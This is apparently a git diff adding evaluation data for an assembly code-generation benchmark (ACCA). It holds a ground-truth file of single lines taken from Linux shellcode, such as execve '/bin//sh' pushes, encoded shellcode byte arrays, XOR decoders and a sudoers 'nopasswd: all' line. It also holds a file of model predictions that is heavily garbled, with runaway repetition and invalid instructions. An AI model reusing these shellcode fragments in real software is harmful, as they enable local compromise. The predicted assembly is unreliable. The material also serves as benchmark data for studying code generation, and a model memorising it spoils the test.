diff --git a/.gitattributes b/.gitattributes index a6344aac8c09253b3b630fb776ae94478aa0275b..f59ad82ab50e740ea2498d7a1f5e69a493f6e74f 100644 --- a/.gitattributes +++ b/.gitattributes @@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text *.zip filter=lfs diff=lfs merge=lfs -text *.zst filter=lfs diff=lfs merge=lfs -text *tfevents* filter=lfs diff=lfs merge=lfs -text +Experimental[[:space:]]Results/Results.xlsx filter=lfs diff=lfs merge=lfs -text diff --git a/ACCA/Ground Truth and Predictions/Ground Truth/decoder_extended-test.out b/ACCA/Ground Truth and Predictions/Ground Truth/decoder_extended-test.out new file mode 100644 index 0000000000000000000000000000000000000000..691ba6ab5899669d3720f0877e060a5eee1ec19f --- /dev/null +++ b/ACCA/Ground Truth and Predictions/Ground Truth/decoder_extended-test.out @@ -0,0 +1,590 @@ +mov ax, [esi] +cmp ecx, 0h +push 0x6d6f632e \\n push 0x656c676f \\n push 0x6f672031 \\n push 0x2e312e31 \\n push 0x2e373231 +sub ecx, 0x1525152a +inc cx +sys_execve equ 0x0b +xor eax, eax \\n xor ebx, ebx +sub bl, al +int 0x80 +sub bl, 3 +pop esi +push 0x69622f2f +section .bss +xor esi, esi +mov eax, [y] +push edi +cmp dword [eax], ebx +get: +call_decoder: +decrypt: +loop main_push +push eax +zerod: +mov eax, esp +mov al, [byte_tbl+2] +mov esi, esp +mov ebx, [y] +duploop: +chmod_call equ 15 +shl ebx, 8 +xor ebx, ebx +push byte 0x02 +shr dl, 4 +push byte my_label \\n pop eax +push dword 0x74652f2f \\n mov ebx, esp +inc esi \\n inc esi +xor edx, edx \\n xor esi, esi +xor ah, ah +jmp loop +int 80h +F2: \\n not bl \\n inc bl +mov [edi], al +push ecx +push edx +encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87 +next_addr: +push word 100 +mov esi, eax +push 0x68732f6e \\n push 0x69622f2f \\n mov ebx, esp +push eax \\n push edx +inc ax +push 0x65782e2f \\n push 0x706d742f +push word 0x462d +mov ecx, esp +lea ecx, [eax] +sub eax, eax +xor eax, esi +jns loopinghere +inc edx +mov bl,0x4 +duploop: +pop esi +push word 0x0a +db 'all all=(all) nopasswd: all', 0xa +jmp short path +mov[esi+39], ebx +div ebx +push ecx +add edi, edi +zero1a: +cmp edx, 0x43 \\n ja loop \\n push edx +add byte [esi], 0x10 +section .text +mov ecx, m_src3 +push word 0x3582 +mov byte [esi+14],al +next_addr: +mov bl, 0x01 +pop esi +dec ecx \\n jns loop +xor byte [esi+1], dl +cmp cl, dl \\n je encodedshellcode +encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80 +lea ecx, [esp] +xor eax,eax \\n xor ebx,ebx +mov edx, 2 +mov esi, esp +mov ebx, esp +sub eax, [esp] +mov cx, 0x301 +hello: db 'hello world!',10 +cmp cl, 0xff \\n jne dup2 +inc esi \\n inc esi +lea ebx, [edx+0x4] +shr dl, 4 +xor eax, 0x6e696230 +call [esp] +mov edi, 0xaaaa9090 +jb next +filecontents: resb 128 +mov al, 23 +mov edx, eax +cmp al, cl \\n jne short decode \\n jmp shellcode +push dword eax +mov bl, 5 +pop ecx +push eax \\n push edx \\n push ecx \\n push ebx \\n mov edi, esp +mov ecx, esp +call write +push 10 \\n mov eax, esp +xchg ebx, eax +mov ecx, esp +mov ecx, esp +mov esi, esp +lea ecx, [esp] +lea edi, [ebx] +xor dl, 0xbb +mov cl, len +mov cl, 0x2 +mov eax, msg3 +push 0x78 +mov al, 11 \\n int 0x80 +sub bx, dx +push 0x61702f2f \\n push 0x6374652f \\n mov eax, esp +mov edi, hexstr +jmp edi +variablename3: resd 1 +jae _start-0x24 +push 0x2 +push eax \\n push 0x68732f2f \\n push 0x6e69622f \\n push ebx, esp \\n mov edx, eax \\n mov al, 0xb \\n int 0x80 +xor ax, bx \\n jz call_decoded +mov edx, 0x1234567 +mov [1000h], ax +pop esi +call_egghunter: +mov ebx, type var3 +open: +mov ecx, esp +switch: +mov byte al, 0xa4 +2: +push 0xb \\n pop eax +mov al, 0xb \\n int 0x80 +cmp BYTE al, 2 \\n je do_inject \\n jmp while +pop ebx +push 0x10 +push byte 49 +mov al, 0x58 +xor eax, eax \\n push eax +cmp eax, ebx \\n je child +mov ax, 8h +push 0x2f2f2f2f \\n mov ecx, esp +call shellcode \\n message db "/bin/sh" +cmp bl, 0x1f +decoder: \\n pop esi \\n mov edi, esi +push 0x68736162 +mov eax, 63 +mov al,0xa2 \\n int 80h +push eax \\n mov ebx, esp +xchg byte [esi+1], al +jmp short enc +mov al,0x8 \\n mov cl,077o +stage: +mov dl, 0x45 +inc esi \\n jmp L1 +movq mm0, qword [edi] +mov byte [esi], dl +inc edi +xor eax, [edi] +mov al, 0x17 +mov [esi+35], esi +dec ecx +push word 0x3436 +call jmp_search +write_syscall equ 4 +cmp BYTE [esi], 0x7 \\n jle lowbound +add eax, 2 +push byte 4 \\n pop eax +push 0x64687373 \\n mov edi, esp +jmp short four +xchg ebx, eax +buffersize: dw 1024 +pop esi \\n mov bx, [esi] +push eax \\n push 0x636e2f6e \\n push 0x69622f2f +push 0x2 +mov ecx, eax +push word 0x8223 +push 0x1ff9090 \\n pop ecx +cmp edx, 42 +push esi +close: +pop ecx \\n loop l1 \\n mov eax, 1 +matrix qw 12*10 +F5: \\n jmp L1 +mov bl, 0xe +mov al, 0x01 +R1: \\n inc esi \\n inc esi +xor byte [esi], 0x2c +mov edi, 0x978cd092 \\n mov ebx, edi +mov ebx, esp +lea ebx, [esp] +push 0x74756f2f +loop bucle +push 0x3a303a3a +jns loop2 +push 0x30 +S1: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73 +F1: \\n pop esi +push 0x68732f2f \\n push 0x6e69622f \\n mov eax, esp +mov cx, 2001Q +jne no_error +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5 +xor eax, 0x58494741 +L3: \\n jmp edi +push ebx +xor ecx, ecx \\n mov cl, shellcode_length +mov al, 0x42 +mov byte [esp], 0x2f +xor ebx, ebx \\n xor edx, edx +mov dword [esp-4], esi +mov [esi], al +xor ecx, ecx \\n mul ecx +jmp short decode_pr +function_5: \\n call [esp] +mov cl, 100 +xchg esi, eax +mov al, 0x66 +xor edx, edx \\n push edx +loop l4 \\n mov edx, esp +sub ecx,ecx \\n push ecx +shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb +mov edx, ecx +test eax, eax \\n jz short loc_402B13 +add eax, 0x10 +mov ecx, ebp +push 0x1 +add ax, [di + 20] +mov al,0x6 +dec esp +push eax +sub eax,20000h +section .bss +pop cx +push 0x6475732f \\n push 0x6374652f \\n mov eax, esp +mov ecx, esp +cmp al, 0xf2 +db 0c6h +cmp eax, eax \\n jne 0x8 +xor ax, 0x3041 +jnz decode +pop ecx \\n mov edi, ecx +add eax, ebx +push 0x2f2f2f2f \\n mov esi, esp +mov cl, al +push ecx +find_address: +shl edx, 9 +dup2: +three: +L1: \\n jmp short esp +push byte 10 +wrap_around: +cmp bl, 78h \\n jge short loc_402B1D +_start: \\n jmp short enc +push word 0x5c11 +read: +mov bl, byte [edi] +db '/bin/sh' +priv_setgid: +sub edx, edx +mov bl, 4 +mov ecx, esp +mov ebx, esp +cdq \\n push edx +xor bl, 0xaa \\n jne encodedshellcode +xor edx, edx +push 0x6374652f \\n mov esi, esp +push byte 0x2 \\n pop eax +sub ecx, ecx +xor edx, edx \\n mov dl, 5 +jmp short stage +sub ax, 1564 +shell_ret: +mov cx,0x3b30 \\n push cx +cmp byte [buff], 7ah +push 0x67513231 +push 2 +push 0x10 +push eax \\n pop edx +message: db 'hello world!' +mov eax, 3 +db 'egg mark' +xor edx, edx +jmp short push_cmd +decode: +xor cl, 0x32 +cmp bl, 0xbb \\n je xordecode \\n jmp notdecode +mov ebx, [ebp-4] +push byte +0x68 +mov cx, 0700 +cdq +mov al, 0xcd +xor cl, 0xaa +cmp al, 0xf2 +mov al, 11 +push 15 \\n mov ecx, esp +xchg eax, ebx +push byte 16 \\n pop eax +mov long [esi+26], eax +mov dword [esp-0x4],eax \\n mov dword [esp-0x8],0x65636170 \\n mov dword [esp-0xc],0x735f6176 \\n mov dword [esp-0x10],0x5f657a69 \\n mov dword [esp-0x14],0x6d6f646e \\n mov dword [esp-0x18],0x61722f6c \\n mov dword [esp-0x1c],0x656e7265 \\n mov dword [esp-0x20],0x6b2f7379 \\n mov dword [esp-0x24],0x732f636f \\n mov dword [esp-0x28],0x72702f2f \\n sub esp,0x28 \\n mov ebx,esp +mov bl, 0x2 +push 0x37333333 \\n push 0x3170762d +push 0x2f2f2f2f +lea esi, [esi +4] +scasd +mov ecx,esp +mov eax, [ebx+8] +bound esp,qword ptr [ebx+0x41] +push ebx +int 3 +xor ecx, ecx \\n xor eax, eax \\n xor edx, edx +push 0x10 \\n push ecx \\n push edx +cmp bl, 0xaa \\n je shellcode +push edx \\n mov ecx, esp +mov bl, 0xff +xor eax, eax \\n xor edx, edx +mov al,2 +cmp ecx, ebp +xchg esp, esi +push dword ebx \\n push dword ebx +push 0x6d726574 +mov al, 0x3f +call decoder +test al, al \\n jz found \\n inc ecx +mov bl, 5 +int 0x80 +marks dw 0, 0, 0, 0 +push eax +sub eax, 0x013ffeff \\n push eax +xor ebx, ebx \\n mov ebx, eax +pop esi +mov al, 102 \\n int 80h +push ebx +xchg ebx, ecx +mov ecx,eax \\n push ecx +add ax, bx +decode: +push byte 0x77 +lea ebx, [esp] +push eax \\n push dword 0x64616568 \\n push dword 0x2f6e6962 \\n push dword 0x2f2f2f2f \\n push dword 0x7273752f +push ebx +xor eax, 0xffffffff +add al,0x3b +mov [esi], al +mov eax, 1 +xor ebx, ebx \\n push ebx +push eax \\n mov edx, esp \\n push ebx \\n mov ecx, esp \\n mov al, 0xb \\n int 0x80 +entrypoint: +mov dl, 0x1c +sub byte [ebp+ecx],20h +push ecx +mov ebx, esp +mov edi, 0x3734b117 +xor byte [esi + ecx - 1], 0x3 +sub byte [esi], 13 +push eax +mov edx, ecx +mov [ebx+8], ebx +push 0x2 \\n pop ecx +lea edx, [esi+0x10] +mov eax, 19 +arr1 resb 400 +xor cl, 0XAA \\n jz shift_decode +nop +decoded_shellcode: \\n call [esp] +mov eax, 90 +cmp ax, bx \\n jne l3 \\n jmp while +format: +mul ebx +lea edi, [esi] +push edx +L4: \\n jmp short esp +push dword 0x8140a8c0 +mov esi, 10 +jmp short setup +push 0x6e69622f \\n push 0x7273752f \\n mov ebx, esp +hlt +mov eax, edx +call _myfunc +sub byte [esi], 0xd +push edx +cmp ecx, 5 +jns decode_pr +zero1e: +int 80h +push ecx \\n push 0x68736162 \\n push 0x2f6e6962 \\n push 0x2f2f2f2f +call _appendfile \\n msg2 db "passwd", 0x00 +xor ecx, ecx \\n mul ecx +D2: \\n not byte [esi] +mul ebx +_write: +inc cl +mov esi, 0x353ffc3b +mov ecx, edx +inc ebx +push 0x78 +mov ecx,esp +xor ah, ah +_load_data: +push ebx \\n push ebx \\n push esi +test eax, eax \\n jnz checkforfile +push edx +mov cl,0x2 +rol edx, 0x4 +mov edi, ecx +mov edi, edx +xor ebx,eax +push byte 67 \\n pop eax +mov esi, eax +push ebx +mov dl, 0x02 +lea edi, [esi +1] +sub ebx, 0x2e2aa163 +xor bx, bx +F2: \\n call function_1 +xor ecx, ecx \\n mul ecx +cmp al, 0xf2 \\n jz next_page +int 0x80 +div edx +mov eax, [x] +cmp eax, ebx \\n je all +my_table times 10 dw 0 +push 0x706d742f +mov ax, 1 +mov al, 5 +scasd +ret +mov al, dl +sub [var2], esi +sub ecx, 23 +push edi \\n mov eax, esp +test eax, eax \\n jz write \\n xor eax, eax +lea ebx, [edx+0x4] +cmp [ebp+var_a], 0 +inc ebx \\n push ebx +word1 word 65535 +sub cx, cx +mov ebx, 4 +incpage: +push word 0x632d \\n mov edi, esp +push ecx +test eax, eax \\n js _while_loop +mov ecx,esp +cmp dword ptr [eax],edx \\n jne loop +jne encodedshellcode +me: +push ebx +cld +sub eax, ebx +mov bl,0x3 +cmp al, 0xf2 \\n jz _start +lea ecx, [esi + 8] +xor ebx, ebx +mov ax, 1666 +mov ebx, esp +push dword 0x61722f6c +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5 +loop l4 \\n mov edx, esp +mov cl, 4 +loop decode \\n jmp Shellcode +xchg eax, ebx +cmp byte [esi], 0xD \\n jl wrap_around +mov byte [esi + 1], dl +mov al, 0x3f +push 0xdebf +section .text +mov al, 15 +push eax +push dword 0x2f2f2f2f \\n push dword 0x7273752f \\n mov ebx, esp +lea ecx, [esp] +push 0x69622f3a +push eax +mov eax, msg1 +lea ecx, [zero_reg+117] +mov dword [esp-0x24], 0x732f636f +push 0x6873732f \\n push 0x6374652f \\n mov edx, esp +inc esi +mov esi, eax +shr ax, cl +cmp eax, ebx +section .text \\n _start: +dec byte dl +jmp callpop +mov eax, 2 +sub esp, 0x7f +push 0x706d742f +xor byte [esi], 0x97 +mov al, 0x5 +inc ebx +mul ebx +mov ax, 0x16b +xor eax,eax \\n xor ebx,ebx +push 0x706d742f +push word 0x1b6 \\n pop ecx +loop fill +push dword eax +shellcode: +neg eax +mov dword [esp-12], 0x6374652f +push 0x7461632f \\n push 0x6e69622f \\n mov edx, esp +push 0x04020a0a +mul [var] +lea ebx, [ebp+39] +mov rcx, 0x68732f2f6e69622f +mov cx, 0x401 +cmp bh, al +push 0x7665642f +jmp short shellcode_section +ja write +mov ecx, 4294948047 +mov al, 0x2e +mov ecx, esp +jmp short stage +je short loc_402b13 +pop ebx +mov ecx, esp +mov eax, 0x50905090 +push byte 0x1 \\n pop edx +shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23 +pop ecx +jmp nextchar +jz download +push 0x3 \\n pop ebx +mov esi, esp +cmp eax,ebx \\n je exit +push dword eax +add byte [esi], 0x02 +mov [ebp+20], zero_reg +push edx \\n push esi \\n push edi \\n push ebx \\n mov ecx, esp +pop eax +zero1b: +mov eax, 65 +jmp short formatting +xchg ebx,eax +jmp edi +xor edx, edx \\n mul edx +xor ax, 0x539 +sub eax, 8 +push 0x61622f6e +push dx +mov ecx,esp +notdecode: +jmp read +push word 0x776f +push 0x68732f2f \\n push 0x68732f2f \\n push 0x2f656c2d +child: +mov edx, response +scasd \\n l1 IncAddr +mov esi, 0x353ffc3b +_ip equ 0x0100007f +lea edx, [ebx+12] +pop esi +xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx +add edx, 32 +xor eax, eax \\n mov ebx, eax \\n mov ecx, eax \\n mov edx, eax +mov byte [esi + 1], dl +push 0xb \\n pop eax +or eax, 0xffffffff \\n not eax \\n push eax +mov bl, 3 \\n dec bl \\n jnz l3 +call decoder \\n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01 +mov al, 0x8 +shr bl, 4 +push 0x746f6f72 +xor eax, eax \\n mov al, 6 +ja exi +mov ecx, 0x1 +mov eax, [ebx+esi*2+4] +_start: \\n jmp short call_shellcode +mov edx, dword 0x65676760 +xor ecx, ecx +sub eax, 3 +_file: +int 0x80 +push dword 0x3a303a3a +cmp BYTE al, 2 \\n je do_inject +movq mm3, qword [esi] +je exit +mov byte [edi], bl +xchg edi,eax +push eax \\n mov edx,esp diff --git a/ACCA/Ground Truth and Predictions/Predictions/assembly_test_output.json b/ACCA/Ground Truth and Predictions/Predictions/assembly_test_output.json new file mode 100644 index 0000000000000000000000000000000000000000..5348b345057b65d3d6f84eb99e61cfdfb297d85a --- /dev/null +++ b/ACCA/Ground Truth and Predictions/Predictions/assembly_test_output.json @@ -0,0 +1,592 @@ +[ + "mov ax, [esi]", + "cmp ecx, 0h", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "sub ecx, 0x1525152a", + "inc cx", + "0x0b equ 0x0b", + "xor eax, eax \\n mul eax", + "sub al, bl", + "mov al, 0x68732f2f \\n int 0x6e69622f", + "sub bl, 3", + "mov esi, esp", + "push 0x69622f2f", + "section .", + "xor esi, esi", + "mov eax, y", + "push edi", + "cmp dword [eax], ebx", + "get_label:", + "call_decoder:", + "decrypt:", + "loop main_push", + "push eax", + "_zerod:", + "mov eax, esp", + "mov al, byte_tbl+2", + "mov esi, esp", + "mov ebx, y", + "duploop_label:", + "=15:", + "shl ebx, 8", + "ebx:", + "push byte 0x02", + "shr dl, 4", + "push byte my_label \\n pop eax", + "push dword 0x74652f2f \\n mov ebx, esp", + "inc esi \\n inc esi \\n inc esi \\n inc esi", + "xor edx, edx \\n xor esi, esi", + "xor ah, ah", + "jmp loop", + "int 0x80", + "bl: not bl \\n inc bl \\n inc bl", + "mov al, edi", + "push ecx", + "push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x", + "encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87", + "_next_addr:", + "push word 100", + "mov esi, eax", + "push bin/sh \\n push ebx", + "push eax \\n push edx", + "add ax, 1", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "push word 0x462d", + "mov ecx, esp", + "push [\\n pop eax \\n pop ecx", + "xor eax, eax", + "xor eax, esi", + "jns loopinghere", + "inc edx", + "mov bl, 0x4", + "duploop:", + "pop esi", + "push af_inet6", + "db 'all all=(all) nopasswd: all'", + "jmp short path", + "pop ebx", + "div ebx", + "push ecx", + "add edi, edi", + "_zero1a:", + "cmp edx, 0x43 \\n jge loop \\n push edx", + "add byte [esi], 0x10", + "section", + "mov ecx, m_src3", + "push word 0x68732f2f \\n push word 0x6e69622f \\n push word 0x69622f \\n push word 0x69622f", + "mov byte [esi+14], al", + "next_addr:", + "mov bl, sys_socket", + "pop esi", + "dec ecx \\n jns loop", + "xor [esi], dl", + "cmp cl, dl \\n je _encodedshellcode", + "0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80", + "mov ecx, esp", + "xor eax, eax \\n mul eax", + "mov edx, 2", + "mov esi, esp", + "mov ebx, esp", + "sub eax, esp", + "mov cx, 0x301", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov linefeed, esp", + "cmp cl, 0xff, \\n jne _dup2", + "inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc", + "lea ebx, [edx+0x4]", + "shr dl, 4", + "xor eax, 0x6e696230", + "int 0x80", + "mov edi, 0xaaaa9090", + "inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov filecontents, esp", + "mov al, 23", + "xchg edx, eax", + "cmp al, cl \\n jne short decode \\n jmp shellcode", + "push dword eax", + "push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov bl, esp", + "pop we", + "push eax \\n push edx \\n push ecx \\n push ebx \\n mov edi, esp", + "mov ecx, esp", + "jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f", + "push 10 \\n mov eax, esp", + "xchg eax, ebx", + "mov ecx, [args]", + "mov ecx, esp", + "mov esi, esp", + "mov ebx, esp", + "lea edi, [ebx]", + "xor dl, 0xbb", + "mov cl, 0x68732f2f \\n add cl, 0x68732f \\n add cl, 0x6e69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x6e69622f \\n add cl, 0x6e69622f \\n add cl, 0x69622f2f \\n add cl, 0x6", + "mov cl, 0x2", + "mov eax, msg3", + "push 0x78", + "int 0x80", + "sub bx, dx", + "push 0x61702f2f \\n push 0x6374652f \\n mov eax, esp", + "mov edi, hexstr", + "jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f", + "push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n", + "jns _start-0x24", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "push temrinated \\n push '/bin//sh' \\n push ebx \\n push edx \\n push temrinated \\n push '/bin//sh' \\n push ebx \\n mov edx, esp", + "xor ax, bx \\n jz call decoded", + "mov edx, 0x1234567", + "mov ax, 1000h", + "pop esi", + "call_egghunter:", + "mov ebx, var3", + "open_label:", + "mov ecx, esp", + "_switch:", + "mov al, byte [0xa4]", + "numeric 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n mov eax, esp", + "mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f", + "cmp al, 2 \\n jne while \\n jmp do_inject", + "pop ebx", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "push byte 49", + "push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n mov ebx, esp", + "push edx", + "cmp eax, ebx \\n jne child", + "mov ax, 8h", + "push 0x2f2f2f2f \\n mov ecx, esp", + "push of /bin/sh \\n push eip \\n mov shellcode_label, esp", + "cmp bl, 0x1f", + "pop esi \\n mov edi, [esi]", + "push 0x68736162", + "mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f", + "int 0x80", + "push eax \\n mov ebx, esp", + "inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc", + "jmp short enc", + "reate: \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n mov 0x77, 0x", + "_stage:", + "mov dl, 0x45", + "inc L2 \\n jmp L2", + "mov mm0, \"xor_value\"", + "mov dl, byte [esi]", + "inc edi", + "xor eax, edi", + "xor 0x17, 0x17", + "mov esi+35, esi", + "dec ecx", + "push word 0x3436", + "call jmp_search", + "write_syscall equ 4", + "cmp BYTE [esi], 0x7 \\n jl lowbound", + "add eax, 2", + "push byte 4 \\n pop eax", + "push 0x64687373 \\n mov edi, esp", + "jmp short four", + "xchg ebx, eax", + "buffersize word 0x68732f \\n 0x68732f \\n 0x6e69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0", + "pop esi \\n mov bx, [esi]", + "push 0-term \\n push cn/n \\n push ib//", + "push for \\n push af_inet", + "mov ecx, eax", + "push word 0x8223", + "push 0x1ff9090 \\n push ecx \\n push 0x10 \\n push 0x1ff9090 \\n push ecx \\n push 0x10 \\n mov 0x10, esp", + "cmp edx, 42", + "push sockfd", + "close_label:", + "pop ecx \\n dec ecx \\n jmp l1", + "for: \\n 12*10: \\n quad-bytes:", + "F5: \\n jmp L1", + "mov bl, 0xe", + "mov byte [eax], 0x1", + "inc R1 \\n inc esi", + "xor 0x2c, esi", + "push 0x978cd092 \\n pop edi \\n pop ebx", + "mov ebx, ptr", + "mov ebx, esp", + "push 0x74756f2f", + "dec ecx \\n jns bucle", + "push 0x3a303a3a", + "jns _loop2", + "push 0x30", + "0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73", + "F1: \\n pop esi", + "mov eax, ASCII /bin/sh", + "mov cx, 2001Q", + "jne no_error", + "cmp cl, 0x11 \\n add dl, 0x5", + "xor eax, 0x58494741", + "L3: \\n jmp edi", + "push ebx", + "xor shellcode_length, shellcode_length \\n mov byte [shellcode_length], shellcode_length", + "mov al, 0x42", + "mov byte [var1], 0x2f", + "xor ebx, ebx \\n mul ebx", + "mov dword [[], esi", + "mov esi, al", + "xor eax, eax \\n xor ecx, ecx", + "decode_pr: \\n inc decode_pr", + "function_5: \\n int 0x80", + "mov cl, 100", + "mov esi, esp", + "mov al, 0x66", + "push edx", + "loop l4 \\n mov edx, esp", + "xor ecx, ecx \\n push ecx", + "shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb", + "mov edx, ecx", + "test eax, eax \\n jz short loc_402B13", + "add eax, 0x10", + "mov ecx, ebp", + "push socket_type \\n push = \\n push sock_stream", + "add ax, di + 20", + "mov al, 0x68732f2f \\n mov al, 0x68732f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622", + "dec esp", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 